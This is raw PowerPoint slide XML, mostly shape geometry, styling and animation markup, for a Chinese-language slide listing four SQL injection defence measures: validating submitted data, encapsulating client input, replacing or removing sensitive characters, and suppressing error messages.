                  <a:pt x="1275" y="4839"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2544" y="4499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2579" y="4490"/>
                  <a:pt x="2606" y="4463"/>
                  <a:pt x="2615" y="4428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2624" y="4394"/>
                  <a:pt x="2614" y="4357"/>
                  <a:pt x="2589" y="4332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2337" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="5502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="2862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2862"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="1907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1907"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="956"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6812EEC0-D263-421C-BADB-E6F10B7A10BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3732961" y="2716969"/>
            <a:ext cx="7024254" cy="830997"/>
            <a:chOff x="3746790" y="2250170"/>
            <a:chExt cx="7024254" cy="830997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476145B7-D4B3-4214-A839-3A97B0F7AFBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="2250170"/>
              <a:ext cx="522206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在服务端正式处理之前对提交数据的合法性进行检查</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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29" name="直接连接符 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D2B4332-A852-4707-8F4C-CBD38990554D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="266626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860167E6-3D59-4C52-BB07-609F2277A148}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3746790" y="2254880"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="六边形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D8EE82-6B4B-49B0-AE64-9474F808C964}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="2676317"/>
                <a:ext cx="954108" cy="822761"/>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6D5F2944-CD71-419D-9E97-1231EBAC2337}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2674273" y="2887049"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3767D8D2-E663-4B64-A7B0-F4E9555ED782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3732961" y="3719970"/>
            <a:ext cx="7024254" cy="822761"/>
            <a:chOff x="3746790" y="3253171"/>
            <a:chExt cx="7024254" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A569E415-834D-4445-A608-41B9B1972FC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="3432534"/>
              <a:ext cx="52220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封装客户端提交信息</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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40" name="直接连接符 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A07D02FA-C8C9-4A4E-A4C2-B6FFBE975536}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="3663959"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2476601-F95D-4E34-8FFC-59EAFB1BD93A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3746790" y="3253171"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="4572440"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="六边形 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C381EA-D2D1-4427-ABE3-1105DAF9113B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="4572440"/>
                <a:ext cx="954108" cy="822761"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="矩形 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4BF2E1-EB5A-4A60-929C-A0CD1337D8A1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2659307" y="4782580"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="组合 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239BB2AE-4DF9-47CC-8B4B-3ACAF2D690E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3732961" y="4753422"/>
            <a:ext cx="8134805" cy="822761"/>
            <a:chOff x="3746790" y="4286623"/>
            <a:chExt cx="8134805" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078ED97D-6D56-4D55-9372-ED03B21775D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="4466579"/>
              <a:ext cx="63326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替换或删除敏感字符</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字符串</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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42" name="直接连接符 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD86036-F9AE-488F-A214-C9D51E03E7C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="4698004"/>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3" name="组合 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EBA950D-B167-4101-AF3D-E241FEE7F690}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3746790" y="4286623"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="六边形 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ED0627-3ADF-4A85-B852-AE46A28AD453}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="2676317"/>
                <a:ext cx="954108" cy="822761"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="矩形 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C37C18E-AA00-4C05-A2AC-1A723AF3F689}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2674273" y="2887049"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D8EA6C-229E-408E-B5E0-541128E1AAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1191829" y="3405216"/>
            <a:ext cx="2275030" cy="2275030"/>
            <a:chOff x="1230579" y="2525851"/>
            <a:chExt cx="2275030" cy="2275030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="组合 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9521A46-D655-417E-87AF-9CC56AE07432}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1230579" y="2525851"/>
              <a:ext cx="2275030" cy="2275030"/>
              <a:chOff x="2716147" y="2106202"/>
              <a:chExt cx="1622946" cy="1622946"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD24D2F1-4E30-48FF-A92A-855775512DC3}"/>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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A60171D-E000-415A-A944-B00D62F27FB3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2828972" y="2219027"/>
                <a:ext cx="1397296" cy="1397296"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="1092F1"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="1092F1"/>
                </a:solidFill>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
                <a:normAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F855D2D5-81D1-4063-AF7E-D399680D43DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1474812" y="3368046"/>
              <a:ext cx="1872640" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <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rPr>
                <a:t>注入防御措施</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239BB2AE-4DF9-47CC-8B4B-3ACAF2D690E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3742217" y="5798736"/>
            <a:ext cx="8134805" cy="822761"/>
            <a:chOff x="3746790" y="4286623"/>
            <a:chExt cx="8134805" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078ED97D-6D56-4D55-9372-ED03B21775D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="4466579"/>
              <a:ext cx="63326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屏蔽出错信息</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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39" name="直接连接符 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD86036-F9AE-488F-A214-C9D51E03E7C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="4698004"/>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6" name="组合 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EBA950D-B167-4101-AF3D-E241FEE7F690}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3746790" y="4286623"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="六边形 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ED0627-3ADF-4A85-B852-AE46A28AD453}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="2676317"/>
                <a:ext cx="954108" cy="822761"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="矩形 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C37C18E-AA00-4C05-A2AC-1A723AF3F689}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2674273" y="2887049"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>4</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2605130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21" presetClass="entr" presetSubtype="1"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="22" presetClass="entr" presetSubtype="8"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="22" presetClass="entr" presetSubtype="8"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par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="8" fill="hold"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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left)">
                                      <p:cBhvr>
                                        <p:cTn id="3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163375" y="837929"/>
            <a:ext cx="4532010" cy="474140"/>
            <a:chOff x="4163375" y="837929"/>
            <a:chExt cx="4532010"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4163375" y="837929"/>
              <a:ext cx="4532010" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyP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对提交数据的合法性进行检查</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="1528093"/>
            <a:ext cx="11161240" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方 案</a:t>
            </a:r>
            <a:r>
